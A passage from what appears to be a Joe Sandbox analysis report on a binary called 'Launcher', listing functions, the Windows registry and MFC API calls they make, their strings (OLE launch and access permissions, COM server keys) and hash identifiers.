                                                                                                    • Instruction Fuzzy Hash: C1018470A00A57DBDB55EFA0851679CBEB27F54704F50804CE6582B282CBB41B08D7DA
                                                                                                    APIs
                                                                                                      • Part of subcall function 0067B8D5: __EH_prolog3.LIBCMT ref: 0067B8DC
                                                                                                      • Part of subcall function 0067B8D5: LoadCursorW.USER32(00000000,00007F02), ref: 0067B8F4
                                                                                                      • Part of subcall function 0067B8D5: SetCursor.USER32(00000000), ref: 0067B8FB
                                                                                                      • Part of subcall function 0067B8D5: RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 0067B911
                                                                                                      • Part of subcall function 0067B8D5: LoadCursorW.USER32(00000000,00007F00), ref: 0067B924
                                                                                                      • Part of subcall function 0067B8D5: SetCursor.USER32(00000000), ref: 0067B92B
                                                                                                    • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 0066E924
                                                                                                      • Part of subcall function 0067C0BC: __EH_prolog3_GS.LIBCMT ref: 0067C0C6
                                                                                                      • Part of subcall function 0067C0BC: #540.MFC42U(00000488,0066C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 0067C0F1
                                                                                                      • Part of subcall function 0067C0BC: RegOpenKeyExW.ADVAPI32 ref: 0067C112
                                                                                                      • Part of subcall function 0067C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0067C13A
                                                                                                      • Part of subcall function 0067C0BC: RegCloseKey.ADVAPI32(?), ref: 0067C151
                                                                                                      • Part of subcall function 0067C0BC: #800.MFC42U ref: 0067C15F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$LoadOpen$#540#800CloseH_prolog3H_prolog3_MessageQuerySendValue
                                                                                                    • String ID: All classes$Can Launch$Cannot Launch$DEFAULTLAUNCHPERMISSION$DefaultLaunchPermission$Global Launch$SOFTWARE\MICROSOFT\OLE
                                                                                                    • API String ID: 1128567903-2386912880
                                                                                                    • Opcode ID: 4d0e3c5c3232849d3f8606b3d5e7066e82a46d5271d61147476206f858c2ecca
                                                                                                    • Instruction ID: 42c8d698a69b878313aef11dd0e766ecac3a53890872c72cc8db478e70f5a767
                                                                                                    • Opcode Fuzzy Hash: 4d0e3c5c3232849d3f8606b3d5e7066e82a46d5271d61147476206f858c2ecca
                                                                                                    • Instruction Fuzzy Hash: DAE092723803A076D23021655C4BF876D9FDBC6F21F12041EB208B93C2CE9199008264
                                                                                                    APIs
                                                                                                      • Part of subcall function 0067B8D5: __EH_prolog3.LIBCMT ref: 0067B8DC
                                                                                                      • Part of subcall function 0067B8D5: LoadCursorW.USER32(00000000,00007F02), ref: 0067B8F4
                                                                                                      • Part of subcall function 0067B8D5: SetCursor.USER32(00000000), ref: 0067B8FB
                                                                                                      • Part of subcall function 0067B8D5: RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 0067B911
                                                                                                      • Part of subcall function 0067B8D5: LoadCursorW.USER32(00000000,00007F00), ref: 0067B924
                                                                                                      • Part of subcall function 0067B8D5: SetCursor.USER32(00000000), ref: 0067B92B
                                                                                                    • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 0066E704
                                                                                                      • Part of subcall function 0067C0BC: __EH_prolog3_GS.LIBCMT ref: 0067C0C6
                                                                                                      • Part of subcall function 0067C0BC: #540.MFC42U(00000488,0066C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 0067C0F1
                                                                                                      • Part of subcall function 0067C0BC: RegOpenKeyExW.ADVAPI32 ref: 0067C112
                                                                                                      • Part of subcall function 0067C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0067C13A
                                                                                                      • Part of subcall function 0067C0BC: RegCloseKey.ADVAPI32(?), ref: 0067C151
                                                                                                      • Part of subcall function 0067C0BC: #800.MFC42U ref: 0067C15F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$LoadOpen$#540#800CloseH_prolog3H_prolog3_MessageQuerySendValue
                                                                                                    • String ID: All classes$Can Access$Cannot Access$DEFAULTACCESSPERMISSION$DefaultAccessPermission$Global Access$SOFTWARE\MICROSOFT\OLE
                                                                                                    • API String ID: 1128567903-1534462617
                                                                                                    • Opcode ID: eec58c794820944e3427ef711e28e11c212dbb64665fe5faf1579b9bd1db1669
                                                                                                    • Instruction ID: 393fb8401669e293156dab978cfb8ae0b7f2c8c3401aee3418f4eb86e9303cdb
                                                                                                    • Opcode Fuzzy Hash: eec58c794820944e3427ef711e28e11c212dbb64665fe5faf1579b9bd1db1669
                                                                                                    • Instruction Fuzzy Hash: 45E092323C075172D33015624C4BF83AA5FD7C6F62F16011EB608763C2CA929A00C664
                                                                                                    APIs
                                                                                                    • #2294.MFC42U(?,000000B8,?), ref: 0066F556
                                                                                                    • #2294.MFC42U(?,000000B1,?,?,000000B8,?), ref: 0066F568
                                                                                                    • #2294.MFC42U(?,000000B2,?,?,000000B1,?,?,000000B8,?), ref: 0066F57A
                                                                                                    • #2294.MFC42U(?,000000A8,?,?,000000B2,?,?,000000B1,?,?,000000B8,?), ref: 0066F58C
                                                                                                    • #2294.MFC42U(?,00000089,?,?,000000A8,?,?,000000B2,?,?,000000B1,?,?,000000B8,?), ref: 0066F59E
                                                                                                    • #2362.MFC42U(?,000000B3,?,?,00000089,?,?,000000A8,?,?,000000B2,?,?,000000B1,?,?), ref: 0066F5B0
                                                                                                    • #2362.MFC42U(?,0000008B,?,?,000000B3,?,?,00000089,?,?,000000A8,?,?,000000B2,?,?), ref: 0066F5C2
                                                                                                    • #2362.MFC42U(?,00001FA5,?,?,0000008B,?,?,000000B3,?,?,00000089,?,?,000000A8,?,?), ref: 0066F5D4
                                                                                                    • #2362.MFC42U(?,000000A9,?,?,00001FA5,?,?,0000008B,?,?,000000B3,?,?,00000089,?,?), ref: 0066F5E6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #2294$#2362
                                                                                                    • String ID:
                                                                                                    • API String ID: 4178481822-0
                                                                                                    • Opcode ID: e58633bced6d5a45809b51faafe11d84fbc9487d8c942ae8110a08502053bd4b
                                                                                                    • Instruction ID: 9c1bad118a6d932b0b267cd0f91742533b8f224a2343a1906e3b40ab748d04ee
                                                                                                    • Opcode Fuzzy Hash: e58633bced6d5a45809b51faafe11d84fbc9487d8c942ae8110a08502053bd4b
                                                                                                    • Instruction Fuzzy Hash: 2D019272241E157AE151F660DC02FEBB35DAF0A710F80812AFB1CD60C1DBA16629C7FA
                                                                                                    APIs
                                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000050), ref: 00676789
                                                                                                    • RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 006767AB
                                                                                                    • RegQueryValueExW.ADVAPI32(?,409,00000000,00000000,?,00000200), ref: 006767E0
                                                                                                    • wsprintfW.USER32 ref: 00676813
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0067690C
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0067691D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close$EnumOpenQueryValuewsprintf
                                                                                                    • String ID: %s <no name>$409
                                                                                                    • API String ID: 3624944744-596716345
                                                                                                    • Opcode ID: e08f1ec2d4422983598de1b5d0effb0bfa5825c6a4f0e1d6fe1454f9913281c5
                                                                                                    • Instruction ID: 18d033f14adb08e6387e2f81f607e4675bd60400b89ed427b7ae69d4b8f61e03
                                                                                                    • Opcode Fuzzy Hash: e08f1ec2d4422983598de1b5d0effb0bfa5825c6a4f0e1d6fe1454f9913281c5
                                                                                                    • Instruction Fuzzy Hash: 0E41A871A012299FDBA4DF64CC45BA9B7BABB84304F1041E9E50DE7250DB729EE4CF11
                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 0066C4BD
                                                                                                    • #324.MFC42U(00000088,00000000,00000008,0066BFBA,00000004), ref: 0066C4CE
                                                                                                    • #567.MFC42U(00000088,00000000,00000008,0066BFBA,00000004), ref: 0066C4E5
                                                                                                    • #567.MFC42U(00000088,00000000,00000008,0066BFBA,00000004), ref: 0066C500
                                                                                                    • #567.MFC42U(00000088,00000000,00000008,0066BFBA,00000004), ref: 0066C516
                                                                                                    • #567.MFC42U(00000088,00000000,00000008,0066BFBA,00000004), ref: 0066C52C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #567$#324H_prolog3
                                                                                                    • String ID: Pg
                                                                                                    • API String ID: 3217428371-1016263835
                                                                                                    • Opcode ID: f403a7d12ab109b8bcb66d5f8b95a8752c50690a6ba22d69461a2eea12eaf32e
                                                                                                    • Instruction ID: 59feef495161b74cb4ef615e80399b0cb7dd9caeba3a54da3971435e1bdbde77
                                                                                                    • Opcode Fuzzy Hash: f403a7d12ab109b8bcb66d5f8b95a8752c50690a6ba22d69461a2eea12eaf32e
                                                                                                    • Instruction Fuzzy Hash: C2015271A01657DBEB419F94841279CFAA2BF59700F50844EE5843B341CBB51B09C7D6
                                                                                                    APIs
                                                                                                    • RegOpenKeyW.ADVAPI32(00677AC1,InprocServer32,00000000), ref: 006779C7
                                                                                                    • RegOpenKeyW.ADVAPI32(00677AC1,InprocHandler32,00000000), ref: 006779DD
                                                                                                    • RegOpenKeyW.ADVAPI32(00677AC1,LocalServer32,00000000), ref: 006779F3
                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,00677AC1), ref: 00677A00
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open$Close
                                                                                                    • String ID: InprocHandler32$InprocServer32$LocalServer32
                                                                                                    • API String ID: 3083169812-2616365248
                                                                                                    • Opcode ID: 2b5cdd7ed08949cfe5487ad921afe904eff4e652cf7b0d6aca1b06652e4349cc
                                                                                                    • Instruction ID: f572a4fa8d241e81f32489b9071f14bd6269e160bafd43fd3bc139ca8e5a2b60
                                                                                                    • Opcode Fuzzy Hash: 2b5cdd7ed08949cfe5487ad921afe904eff4e652cf7b0d6aca1b06652e4349cc
                                                                                                    • Instruction Fuzzy Hash: 9CF03A3125810AFBDB11CFB1DC09EAF7ABEEF00789B108124B605E1160EB70DB12EB64
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(0067D19D,?,80000000,00000000), ref: 0067D846
                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,006621A0,00000000,000F003F,00000000,?,?,?,80000000,00000000), ref: 0067D881
                                                                                                    • lstrcpyW.KERNEL32(?,0067D19D,?,80000000,00000000), ref: 0067D899
                                                                                                    • lstrlenW.KERNEL32(80000000,?,80000000,00000000), ref: 0067D8A0
                                                                                                    • lstrlenW.KERNEL32(?,?,80000000,00000000), ref: 0067D8B1
                                                                                                    • RegSetValueExW.ADVAPI32(?,80000000,00000000,00000001,?,00000000,?,80000000,00000000), ref: 0067D8EA
                                                                                                    • RegCloseKey.ADVAPI32(?,?,80000000,00000000), ref: 0067D8FC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$CloseCreateValuelstrcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 2938206059-0
                                                                                                    • Opcode ID: 225ed6856969eeb68b5f24009af6c992dedac438982fbadd6b4123ea5ca1f8d8
                                                                                                    • Instruction ID: f9b11f8f4e75a042767d6b7a861c1d4c6c8cfd90a5d6fed0370846109ecf21f1
                                                                                                    • Opcode Fuzzy Hash: 225ed6856969eeb68b5f24009af6c992dedac438982fbadd6b4123ea5ca1f8d8
                                                                                                    • Instruction Fuzzy Hash: 7A212BB160021AEBDB10DFA5ED48FEB77BEAB44300F008696F619D7151DA709A448F60
                                                                                                    APIs
                                                                                                    • GetMessagePos.USER32 ref: 0067210B
                                                                                                      • Part of subcall function 006791B7: ScreenToClient.USER32(?,?), ref: 006791C2
                                                                                                    • #3909.MFC42U(?,?,?,?,?,?), ref: 0067218B
                                                                                                      • Part of subcall function 006791E9: SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 006791FB
                                                                                                      • Part of subcall function 006778FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 0067790C
                                                                                                    • #6266.MFC42U(00000002,?,?,?,00000000,00000014,00000000,?,?,?,?,?), ref: 00672479
                                                                                                    • #2430.MFC42U(00000002,?,?,?,00000000,00000014,00000000,?,?,?,?,?), ref: 00672484
                                                                                                    • #2430.MFC42U(00000002,?,?,?,00000000,00000014,00000000,?,?,?,?,?), ref: 0067248F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$#2430Send$#3909#6266ClientScreen
                                                                                                    • String ID: TypeLib
                                                                                                    • API String ID: 852555880-4260498707
                                                                                                    • Opcode ID: 2fbf3e2a0571e45373fec9fb59e4fea48e08824d168cbbc08d8556e9efadf809
                                                                                                    • Instruction ID: 2c7413925a2c88da1b05a4b69aacf49ee73daaba7c8847c0aa677622278ba129
                                                                                                    • Opcode Fuzzy Hash: 2fbf3e2a0571e45373fec9fb59e4fea48e08824d168cbbc08d8556e9efadf809
                                                                                                    • Instruction Fuzzy Hash: 93A13C3194022A9BEB74EB54CC9ABECB3B2AF14311F1081E9A10D662E1CB745FC5CF15
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: isspace$isdigit$isxdigittoupper
                                                                                                    • String ID:
                                                                                                    • API String ID: 4280169866-0
                                                                                                    • Opcode ID: 56be15eb809afc5af3ebaeeb5cd5f75d19ee3f6d22d19f5646c0b2d452cde15e
                                                                                                    • Instruction ID: 2997d88f4f57084deba3242069e0bf6cf11574231983ba94661b60b9b5f61d2d
                                                                                                    • Opcode Fuzzy Hash: 56be15eb809afc5af3ebaeeb5cd5f75d19ee3f6d22d19f5646c0b2d452cde15e
                                                                                                    • Instruction Fuzzy Hash: 1D3190F2900122D7DB241F699C445B677FAEF597717268A2AF889C7280EB74CC81D660
                                                                                                    APIs
                                                                                                    • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00677E9A
                                                                                                    • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00677EBD
                                                                                                    • #861.MFC42U(?), ref: 00677EDA
                                                                                                    • RegCloseKey.ADVAPI32(00000000,?), ref: 00677EEE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue$#861Close
                                                                                                    • String ID: ToolboxBitmap$ToolboxBitmap32
                                                                                                    • API String ID: 1198224557-4222126835
                                                                                                    • Opcode ID: 4046d88da252fd1afa3b7171a40799ceef1f102acd4cd6035b1c9e7023391e71
                                                                                                    • Instruction ID: ef7bf6deac1e463e1eded435b19e1d232cd4ad8eb673cec0926fbd2b88b584ea
                                                                                                    • Opcode Fuzzy Hash: 4046d88da252fd1afa3b7171a40799ceef1f102acd4cd6035b1c9e7023391e71
                                                                                                    • Instruction Fuzzy Hash: 45014C71A4011D9BCB60DF10CC89FEA77BABF28305F1042E9A11EE2291DB309E85DF20
                                                                                                    APIs
                                                                                                    • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00677E9A
                                                                                                    • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00677EBD
                                                                                                    • #861.MFC42U(?), ref: 00677EDA
                                                                                                    • RegCloseKey.ADVAPI32(00000000,?), ref: 00677EEE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue$#861Close
                                                                                                    • String ID: ToolboxBitmap$ToolboxBitmap32
                                                                                                    • API String ID: 1198224557-4222126835
                                                                                                    • Opcode ID: 22e967a24afeb4a1a4035f5f03fe0e1474401fae5a284ce741f60df6dbcbb17c
                                                                                                    • Instruction ID: ef7bf6deac1e463e1eded435b19e1d232cd4ad8eb673cec0926fbd2b88b584ea
                                                                                                    • Opcode Fuzzy Hash: 22e967a24afeb4a1a4035f5f03fe0e1474401fae5a284ce741f60df6dbcbb17c
                                                                                                    • Instruction Fuzzy Hash: 45014C71A4011D9BCB60DF10CC89FEA77BABF28305F1042E9A11EE2291DB309E85DF20
                                                                                                    APIs
                                                                                                    • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00677E9A
                                                                                                    • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00677EBD
                                                                                                    • #861.MFC42U(?), ref: 00677EDA
                                                                                                    • RegCloseKey.ADVAPI32(00000000,?), ref: 00677EEE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue$#861Close
                                                                                                    • String ID: ToolboxBitmap$ToolboxBitmap32
                                                                                                    • API String ID: 1198224557-4222126835
                                                                                                    • Opcode ID: 84658628cdde29258739651e49521bdaee047e5b41f7b18e837657c3866413b8
                                                                                                    • Instruction ID: ef7bf6deac1e463e1eded435b19e1d232cd4ad8eb673cec0926fbd2b88b584ea
                                                                                                    • Opcode Fuzzy Hash: 84658628cdde29258739651e49521bdaee047e5b41f7b18e837657c3866413b8
                                                                                                    • Instruction Fuzzy Hash: 45014C71A4011D9BCB60DF10CC89FEA77BABF28305F1042E9A11EE2291DB309E85DF20
                                                                                                    APIs
                                                                                                    • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00677E9A
                                                                                                    • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00677EBD
                                                                                                    • #861.MFC42U(?), ref: 00677EDA
                                                                                                    • RegCloseKey.ADVAPI32(00000000,?), ref: 00677EEE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue$#861Close
                                                                                                    • String ID: ToolboxBitmap$ToolboxBitmap32
                                                                                                    • API String ID: 1198224557-4222126835
                                                                                                    • Opcode ID: 6efdc01a3fcb405f763d4f982992b8901bd58b096a87999038b1f11e6089b6f8
                                                                                                    • Instruction ID: ef7bf6deac1e463e1eded435b19e1d232cd4ad8eb673cec0926fbd2b88b584ea
                                                                                                    • Opcode Fuzzy Hash: 6efdc01a3fcb405f763d4f982992b8901bd58b096a87999038b1f11e6089b6f8
                                                                                                    • Instruction Fuzzy Hash: 45014C71A4011D9BCB60DF10CC89FEA77BABF28305F1042E9A11EE2291DB309E85DF20
                                                                                                    APIs
                                                                                                    • #4704.MFC42U ref: 0066C80D
                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 0066C838
                                                                                                    • SendMessageW.USER32(?,00001061,00000001,?), ref: 0066C85C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$#4704
                                                                                                    • String ID: Can Access$User/Group$j
                                                                                                    • API String ID: 2927661609-2049629346
                                                                                                    • Opcode ID: 56653075c91b1a2f3edc4d9b214dff913f01f1ba28a534164aa8027c15b2ac80
                                                                                                    • Instruction ID: 3674579b93748e4411429414f6bf08e476a9d9eade8171545e590809abb704b1
                                                                                                    • Opcode Fuzzy Hash: 56653075c91b1a2f3edc4d9b214dff913f01f1ba28a534164aa8027c15b2ac80
                                                                                                    • Instruction Fuzzy Hash: 92F0627190020DAFFB109F95CC49FEFBFBEEB85714F10051AE90176240C7B559548BA1
                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 006793B6
                                                                                                    • #540.MFC42U(00000004,006799BF,?,?,?,00000000,00000000), ref: 006793C9
                                                                                                    • #540.MFC42U(00000004,006799BF,?,?,?,00000000,00000000), ref: 006793D5
                                                                                                    • #540.MFC42U(00000004,006799BF,?,?,?,00000000,00000000), ref: 006793E1
                                                                                                    • #858.MFC42U(?,00000004,006799BF,?,?,?,00000000,00000000), ref: 006793F0
                                                                                                    • #858.MFC42U(?,?,00000004,006799BF,?,?,?,00000000,00000000), ref: 006793FB
                                                                                                    • #858.MFC42U(?,?,?,00000004,006799BF,?,?,?,00000000,00000000), ref: 00679406
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #540#858$H_prolog3
                                                                                                    • String ID:
                                                                                                    • API String ID: 3210275551-0
                                                                                                    • Opcode ID: bcebc83552334bd41e927b0ca6b296e4e3b332443f08c9c474b58961c0ffc1e4
                                                                                                    • Instruction ID: 90ccaa10d205241d051e08d85578250f07e448b389b2be49fb7b041d4c6e2b29
                                                                                                    • Opcode Fuzzy Hash: bcebc83552334bd41e927b0ca6b296e4e3b332443f08c9c474b58961c0ffc1e4
